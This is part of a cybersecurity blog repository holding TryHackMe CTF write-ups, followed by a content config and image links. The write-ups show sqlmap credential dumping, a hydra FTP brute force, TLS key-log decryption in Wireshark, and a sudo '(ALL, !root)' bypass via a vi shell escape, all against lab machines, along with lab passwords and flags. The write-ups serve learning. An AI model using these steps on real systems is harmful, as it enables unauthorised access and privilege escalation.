113 | 114 | ``` 115 | No awnser needed 116 | ``` 117 | 118 | ### #7 What was the username? 
119 | 120 | Dump the database using sqlmap 121 | 122 | ``` 123 | ➜ ~ sqlmap -u http://10.10.180.236/login.php --forms --dbs 124 | ``` 125 | 126 | ![https://imgur.com/9yukJFN.png](https://imgur.com/9yukJFN.png) 127 | 128 | ![https://imgur.com/lu0ABlM.png](https://imgur.com/lu0ABlM.png) 129 | 130 | Let's see the content of the wordpress8080 database 131 | 132 | ``` 133 | ➜ ~ sqlmap -u http://10.10.180.236/login.php --forms --dbs --dump-all -D wordpress8080 134 | ``` 135 | 136 | ![https://imgur.com/ucY2JNZ.png](https://imgur.com/ucY2JNZ.png) 137 | 138 | Credentials retrieved (the dump shows the password in clear text, so it was apparently stored unhashed) 139 | 140 | ``` 141 | Username : admin 142 | Password : SuperSecretPassword 143 | ``` 144 | 145 | ### #8 What was the password? 146 | 147 | ``` 148 | SuperSecretPassword 149 | ``` 150 | 151 | ### #9 Now you have these credentials, where else on the site can you go? Using the credentials you have and another part of the site, login and try to execute remote commands on the server. 152 | 153 | ``` 154 | No answer needed 155 | ``` 156 | 157 | ### #10 Can you get a reverse shell back to your local machine? 158 | 159 | ``` 160 | No answer needed 161 | ``` 162 | 163 | ### #11 Can you crack anyones password? Using the very popular rockyou.txt 164 | 165 | ``` 166 | No answer needed 167 | ``` 168 | 169 | ### #12 What is the final cracked hash password for the user "user"? 
170 | 171 | Let's upload the reverse shell on the wordpress blog 172 | 173 | ![https://imgur.com/z6QQkJF.png](https://imgur.com/z6QQkJF.png) 174 | 175 | ![https://imgur.com/AIcHLNM.png](https://imgur.com/AIcHLNM.png) 176 | 177 | ![https://imgur.com/9B1RXrg.png](https://imgur.com/9B1RXrg.png) 178 | 179 | Nice we have the creds for the database let's try them 😇 180 | 181 | ![https://imgur.com/csDngND.png](https://imgur.com/csDngND.png) 182 | 183 | ![https://imgur.com/DElAc2V.png](https://imgur.com/DElAc2V.png) 184 | 185 | ``` 186 | SuperSecretPassword 187 | ``` 188 | 189 | 190 | -------------------------------------------------------------------------------- /src/content/blog/wireshark-ctf.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Wireshark CTF - TryHackMe" 3 | category: "THM" 4 | pubDate: "2020-06-07" 5 | description: "Writeup for the Wireshark CTF room on TryHackMe" 6 | --- 7 | [TryHackMe | Wireshark CTF](https://tryhackme.com/room/wirectf) 8 | 9 | A CTF challenge set by csaw. During this task, you will be have to inspect a pcap file (using programs such as tshark and wireshark). You will analysis the file and release something has been "transferred". 10 | 11 | --- 12 | 13 | ### #1 Download and look through the pcap file to analyse the traffic in order to find the flag. 
14 | 15 | ![](https://imgur.com/G0W0wNx.png) 16 | 17 | ```python 18 | import string 19 | import random 20 | from base64 import b64encode, b64decode 21 | 22 | FLAG = 'flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}' 23 | 24 | enc_ciphers = ['rot13', 'b64e', 'caesar'] 25 | # dec_ciphers = ['rot13', 'b64d', 'caesard'] 26 | 27 | def rot13(s): 28 | _rot13 = string.maketrans( 29 | "ABCDEFGHIJKLMabcdefghijklmNOPQRSTUVWXYZnopqrstuvwxyz", 30 | "NOPQRSTUVWXYZnopqrstuvwxyzABCDEFGHIJKLMabcdefghijklm") 31 | return string.translate(s, _rot13) 32 | 33 | def b64e(s): 34 | return b64encode(s) 35 | 36 | def caesar(plaintext, shift=3): 37 | alphabet = string.ascii_lowercase 38 | shifted_alphabet = alphabet[shift:] + alphabet[:shift] 39 | table = string.maketrans(alphabet, shifted_alphabet) 40 | return plaintext.translate(table) 41 | 42 | def encode(pt, cnt=50): 43 | tmp = '2{}'.format(b64encode(pt)) 44 | for cnt in xrange(cnt): 45 | c = random.choice(enc_ciphers) 46 | i = enc_ciphers.index(c) + 1 47 | _tmp = globals()[c](tmp) 48 | tmp = '{}{}'.format(i, _tmp) 49 | 50 | return tmp 51 | 52 | if __name__ == '__main__': 53 | print encode(FLAG, cnt=50) 54 | ``` 55 | 56 | --- 57 | 58 | In this challenge you will be analysing a pcap file using Wireshark, looking for 5 hidden "pumpkins". 59 | 60 | This challenge was credit by [cloudshark](http://cloudshark.org/) 61 | 62 | ### #1 When you find the first (most obvious) ascii pumpkin, what was the destination IP address? 63 | 64 | ![](https://imgur.com/s1D6Wkk.png) 65 | 66 | ``` 67 | 175.187.69.163 68 | ``` 69 | 70 | ### #2 Download all images found in the pcap file. What is the name of the pumpkin image? 71 | 72 | ![](https://imgur.com/l07xZYy.png) 73 | 74 | ### #3 Find the pumpkin that on TCP port 666. Whats the main character that makes the pumpkin up? 75 | 76 | ``` 77 | tcp.port == 666 78 | ``` 79 | 80 | ![](https://imgur.com/foOFVUm.png) 81 | 82 | ``` 83 | $ 84 | ``` 85 | 86 | ### #4 Find the pre-master token and decrypt the traffic. 
What the file data size of this next pumpkin (in bytes)? 87 | 88 | ``` 89 | tcp.port == 25 90 | ``` 91 | 92 | ![](https://imgur.com/v3IfjWP.png) 93 | 94 | ``` 95 | CLIENT RANDOM = 4CD4ADF90628A9AFB29D50F093A5FAD4FC09CCF3F173E52F7B2390573989659F E8AC4AFFCDAD005F5ED4E29D2625A49378A25E7D5B85D5418AC51C1D0CC50B52B39DB3998C606202339178C1EA441CE0 96 | ``` 97 | 98 | With this key material Wireshark can decrypt the SSL/TLS messages. The line follows the TLS key-log format: the label `CLIENT_RANDOM`, then the client random that identifies the session, then the master secret for that session. Anyone who holds such a line and a capture of the session can read the traffic, which is why sending it over unencrypted mail (port 25 here) gives the session away. 99 | 100 | To import it, copy the whole client-random line into a text file in the `CLIENT_RANDOM <client random> <secret>` form shown below, then in Wireshark go to Edit, Preferences, Protocols, TLS and select that file as the (Pre)-Master-Secret log filename 101 | 102 | ![](https://imgur.com/dsuXpIb.png) 103 | 104 | ``` 105 | ➜ TryHackMe cat client_random.txt 106 | CLIENT_RANDOM 4CD4ADF90628A9AFB29D50F093A5FAD4FC09CCF3F173E52F7B2390573989659F E8AC4AFFCDAD005F5ED4E29D2625A49378A25E7D5B85D5418AC51C1D0CC50B52B39DB3998C606202339178C1EA441CE0 107 | ``` 108 | 109 | ![](https://imgur.com/h0B1a9m.png) 110 | 111 | ``` 112 | Content-encoded entity body (gzip): 222 bytes -> 711 bytes 113 | ``` 114 | 115 | ### #5 Extract the RTP stream. What is the audio file from? 116 | 117 | With the default tools in wireshark (Telephony RTP) there is no data found.. 
118 | 119 | After some time I tried to isolate two communication on the UDP port 1313 120 | 121 | The command to isolate is : 122 | 123 | ``` 124 | ip.addr == 114.226.7.182 && udp.port == 51393 && ip.addr == 184.66.140.88 && udp.port == 1313 125 | ``` 126 | 127 | ![](https://imgur.com/s1Vz5pN.png) 128 | 129 | Once you type the filter you need to click on the first and right click then "decode as" 130 | 131 | ![](https://imgur.com/8M8gMOw.png) 132 | 133 | Then click on the "current" and select the RTP protocol 👍 134 | 135 | After that we can analyse the RTP communication with the tools on wireshark 136 | 137 | ![](https://imgur.com/6x6FARF.png) 138 | 139 | ![](https://imgur.com/X0XGMGK.png) 140 | 141 | To answer the last question you need to listen the audio file 142 | 143 | 144 | -------------------------------------------------------------------------------- /src/content/blog/year-of-the-rabbit.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: "Year of the Rabbit CTF - TryHackMe" 3 | category: "THM" 4 | pubDate: "2020-06-15" 5 | description: "Writeup for the Year of the Rabbit CTF room on TryHackMe" 6 | --- 7 | 8 | [TryHackMe | Year of the Rabbit CTF](https://tryhackme.com/room/yearoftherabbit) 9 | 10 | ![](https://imgur.com/LmK6uGc.png) 11 | 12 | Can you hack into the Year of the Rabbit box without falling down a hole? 
13 | 14 | **(Please ensure your volume is turned up!)** 15 | 16 | --- 17 | 18 | ### Setup ✅ 19 | 20 | ``` 21 | ➜ TryHackMe nmap -A -vv 10.10.233.188 22 | ``` 23 | 24 | ``` 25 | 21/tcp open ftp syn-ack vsftpd 3.0.2 26 | 27 | 22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5 (protocol 2.0) 28 | | ssh-hostkey: 29 | | 1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA) 30 | | ssh-dss AAAAB3NzaC1kc3MAAACBAILCKdtvyy1FqH1gBS+POXpHMlDynp+m6Ewj2yoK2PJKJeQeO2yRty1/qcf0eAHJGRngc9+bRPYe4M518+7yBVdO2p8UbIItiGzQHEXJu0tGdhIxmpbTdCT6V8HqIDjzrq2OB/PmsjoApVHv9N5q1Mb2i9J9wcnzlorK03gJ9vpxAAAAFQDVV1vsKCWHW/gHLSdO40jzZKVoyQAAAIA9EgFqJeRxwuCjzhyeASUEe+Wz9PwQ4lJI6g1z/1XNnCKQ9O6SkL54oTkB30RbFXBT54s3a11e5ahKxtDp6u9yHfItFOYhBt424m14ks/MXkDYOR7y07FbBYP5WJWk0UiKdskRej9P79bUGrXIcHQj3c3HnwDfKDnflN56Fk9rIwAAAIBlt2RBJWg3ZUqbRSsdaW61ArR4YU7FVLDgU0pHAIF6eq2R6CCRDjtbHE4X5eW+jhi6XMLbRjik9XOK78r2qyQwvHADW1hSWF6FgfF2PF5JKnvPG3qF2aZ2iOj9BVmsS5MnwdSNBytRydx9QJiyaI4+HyOkwomj0SINqR9CxYLfRA== 31 | | 2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA) 32 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZyTWF65dczfLiKN0cNpHhm/nZ7FWafVaCf+Oxu7+9VM4GBO/8eWI5CedcIDkhU3Li/XBDUSELLXSRJOtQj5WdBOrFVBWWA3b3ICQqk0N1cmldVJRLoP1shBm/U5Xgs5QFx/0nvtXSGFwBGpfVKsiI/YBGrDkgJNAYdgWOzcQqol/nnam8EpPx0nZ6+c2ckqRCizDuqHXkNN/HVjpH0GhiscE6S6ULvq2bbf7ULjvWbrSAMEo6ENsy3RMEcQX+Ixxr0TQjKdjW+QdLay0sR7oIiATh5AL5vBGHTk2uR8ypsz1y7cTyXG2BjIVpNWeTzcip7a2/HYNNSJ1Y5QmAXoKd 33 | | 256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA) 34 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHKavguvzBa889jvV30DH4fhXzMcLv6VdHFx3FVcAE0MqHRcLIyZcLcg6Rf0TNOhMQuu7Cut4Bf6SQseNVNJKK8= 35 | | 256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519) 36 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFBJPbfvzsYSbGxT7dwo158eVWRlfvXCxeOB4ypi9Hgh 37 | 38 | 80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian)) 39 | | http-methods: 40 | |_ Supported Methods: GET HEAD POST OPTIONS 41 | |_http-server-header: Apache/2.4.10 (Debian) 
42 | |_http-title: Apache2 Debian Default Page: It works 43 | Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel 44 | ``` 45 | 46 | ![](https://imgur.com/cU5jZhK.png) 47 | 48 | Let's see if there is some hidden directory 49 | 50 | ``` 51 | ➜ TryHackMe dirb http://10.10.233.188/ 52 | ``` 53 | 54 | ![](https://imgur.com/FC69Qf4.png) 55 | 56 | ``` 57 | Take a look at the page: /sup3r_s3cr3t_fl4g.php 58 | ``` 59 | 60 | ![](https://imgur.com/gwtfthw.png) 61 | 62 | Well let's turn off javascript 63 | 64 | [Firefox: Enable/Disable Javascript - Technipages](https://www.technipages.com/firefox-enable-disable-javascript) 65 | 66 | ![](https://imgur.com/vrBiQ1R.png) 67 | 68 | ![](https://imgur.com/GY5WvWS.jpg) 69 | 70 | As the message says you need to listen to the music 71 | 72 | Approximately at 1min in the video you can hear 73 | 74 | > I'll put you out of your misery you're looking in the wrong place 75 | 76 | Just to be sure let's intercept the page with burp suite 77 | 78 | ![](https://imgur.com/SLXGaRd.png) 79 | 80 | I tried to intercept some hidden directory without the JS enable, with JS enabled this came out 81 | 82 | ``` 83 | http://10.10.233.188/intermediary.php?hidden_directory=/WExYY2Cv-qU 84 | ``` 85 | 86 | ![](https://imgur.com/1ApgXFh.png) 87 | 88 | Let's see if there is something hidden on the image 🤓 89 | 90 | ![](https://imgur.com/GKIUOxb.png) 91 | 92 | Let's create a word-list and use hydra to launch the bruteforce attack ! 93 | 94 | ``` 95 | ➜ TryHackMe hydra -l ftpuser -P ftppass.txt ftp://10.10.233.188 96 | ``` 97 | 98 | ![](https://imgur.com/SpqCPLF.png) 99 | 100 | ``` 101 | login: ftpuser 102 | password: 5iez1wGXKfPKQ 103 | ``` 104 | 105 | ![](https://imgur.com/cWtAqxJ.png) 106 | 107 | As you can see there is this password encoded with brainfuck let's crack it ! 🤑 108 | 109 | [Brainfuck/Text/Ook! obfuscator - deobfuscator. 
Decode and encode online.](https://www.splitbrain.org/_static/ook/) 110 | 111 | ![](https://imgur.com/pMgtoU4.png) 112 | 113 | ``` 114 | User: eli 115 | Password: DSpDiM1wAEwid 116 | ``` 117 | 118 | ### #1 What is the user flag? 119 | 120 | Let's use the creds that we cracked earlier and connect to the ssh server 121 | 122 | ![](https://imgur.com/SFc05u1.png) 123 | 124 | Nothing there let's try something else 😢 125 | 126 | ![](https://imgur.com/IyB33Vb.png) 127 | 128 | ``` 129 | password: MniVCQVhQHUNI 130 | ``` 131 | 132 | ``` 133 | ssh gwendoline@10.10.233.188 134 | ``` 135 | 136 | ![](https://imgur.com/g9yP7Vb.png) 137 | 138 | ``` 139 | THM{1107174691af9ff3681d2b5bdb5740b1589bae53} 140 | ``` 141 | 142 | ### #2 What is the root flag? 143 | 144 | ``` 145 | gwendoline@year-of-the-rabbit:~$ sudo -l 146 | Matching Defaults entries for gwendoline on year-of-the-rabbit: 147 | env_reset, mail_badpass, 148 | secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin 149 | 150 | User gwendoline may run the following commands on year-of-the-rabbit: 151 | (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt 152 | ``` 153 | 154 | Two things are wrong with this rule from a defender's view: the `(ALL, !root)` exclusion is the pattern that CVE-2019-14287 bypasses on unpatched sudo, so it does not actually keep gwendoline from running the command as root, and `vi` can start a shell, so any sudo rule for it hands over a shell as the target user. [CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions](https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability) 155 | 156 | [vi | GTFOBins](https://gtfobins.github.io/gtfobins/vi/#shell) 157 | 158 | ![](https://imgur.com/9K0VeSI.png) 159 | 160 | ``` 161 | #Type the following commands in vi 162 | vi 163 | :set shell=/bin/sh 164 | :shell 165 | ``` 166 | 167 | ``` 168 | #Root flag 169 | THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161} 170 | ``` 171 | 172 | 173 | -------------------------------------------------------------------------------- /src/content/config.ts: -------------------------------------------------------------------------------- 1 | import { defineCollection, z } from "astro:content"; 2 | 3 | const blog = defineCollection({ 4 | // Type-check frontmatter using a schema 5 | schema: z.object({ 
6 | title: z.string(), 7 | description: z.string(), 8 | // Transform string to Date object 9 | pubDate: z.coerce.date(), 10 | updatedDate: z.coerce.date().optional(), 11 | featured: z.boolean().optional(), 12 | heroImage: z.string().optional(), 13 | }), 14 | }); 15 | 16 | export const collections = { blog }; 17 | -------------------------------------------------------------------------------- /src/content/images/annonforce/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/annonforce/hero.jpeg -------------------------------------------------------------------------------- /src/content/images/annonymous/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/annonymous/hero.png -------------------------------------------------------------------------------- /src/content/images/anthem/hero.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/anthem/hero.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled01.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled1.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled1.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled10.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled11.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled12.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled13.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled14.png -------------------------------------------------------------------------------- 
/src/content/images/artemis/Untitled15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled15.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled16.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled17.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled18.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled19.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled2.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled20.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled21.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled22.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled23.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled24.png -------------------------------------------------------------------------------- 
/src/content/images/artemis/Untitled25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled25.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled26.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled26.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled27.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled27.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled28.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled28.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled29.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled3.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled3.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled30.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled30.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled31.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled31.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled32.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled32.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled33.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled34.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled34.png -------------------------------------------------------------------------------- 
/src/content/images/artemis/Untitled35.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled35.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled36.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled36.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled37.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled37.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled4.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled5.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled6.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled6.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled7.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled8.png -------------------------------------------------------------------------------- /src/content/images/artemis/Untitled9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/Untitled9.png -------------------------------------------------------------------------------- /src/content/images/artemis/hero.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/artemis/hero.jpg -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled.png -------------------------------------------------------------------------------- 
/src/content/images/attackingkerberos/Untitled1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled1.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled2.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled3.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled4.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled5.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled6.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled6.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled7.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled8.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/Untitled9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/Untitled9.png -------------------------------------------------------------------------------- /src/content/images/attackingkerberos/hero.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/attackingkerberos/hero.jpg -------------------------------------------------------------------------------- /src/content/images/basicmalware/hero.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LasCC/Cyber-Security-Blog/c53b49d310a5e8eb2fc28fab4e757a72c78938ee/src/content/images/basicmalware/hero.jpeg 
